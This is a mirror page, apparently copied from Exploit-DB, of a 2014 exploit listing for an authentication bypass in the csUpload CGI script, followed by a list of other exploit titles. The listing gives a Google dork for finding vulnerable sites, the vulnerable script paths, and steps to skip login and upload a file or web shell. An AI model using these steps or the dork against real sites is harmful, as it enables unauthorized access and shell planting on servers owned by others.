csUpload Script Site – Authentication Bypass

Exploit Database
11 阅读

作者： Satanic2000

日期： 2014-04-09
类别：
- webapps
平台：
- multiple
来源：https://www.exploit-db.com/exploits/32765/

# Exploit Title: ["csUpload Script Site" Authentication Bypass]
# Google Dork: [CSUpload.cgi?command=]
# Date: 4/9/2014
# Exploit Author: Satanic2000
# Vendor Homepage: http://www.cgiscript.net
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
# Version: 
# Tested on: linux
# www.Site.com/[path]/CSUpload/CSUpload.cgi
# [path] : /cgi-script/ or /cgi-bin/ or None

# Example:

# 1-http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login

# 2- Bypass Authenticationhttp://localhost/cgi-bin/CSUpload/CSUpload.cgi

# 3- Select Database Select Databases And Upload (File,Or Shell)

# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend

last Exploits
csUpload Script Site – Authentication Bypass的更多信息

VestaCP 0.9.8 – ‘v_sftp_licence’ Command Injection：
PHP State – ‘id’ SQL Injection：
WordPress Plugin Community Events 1.2.1 – SQL Injection：
lanewsfactory – Multiple Vulnerabilities：
NeoBill – ‘/install/include/solidstate.php’ Multiple SQL Injections：
Oracle Demantra 12.2.1 – Persistent Cross-Site Scripting：
DaFun Spirit 2.2.5 – Multiple Remote File Inclusions：
Gitlab 13.10.2 – Remote Code Execution (Authenticated)：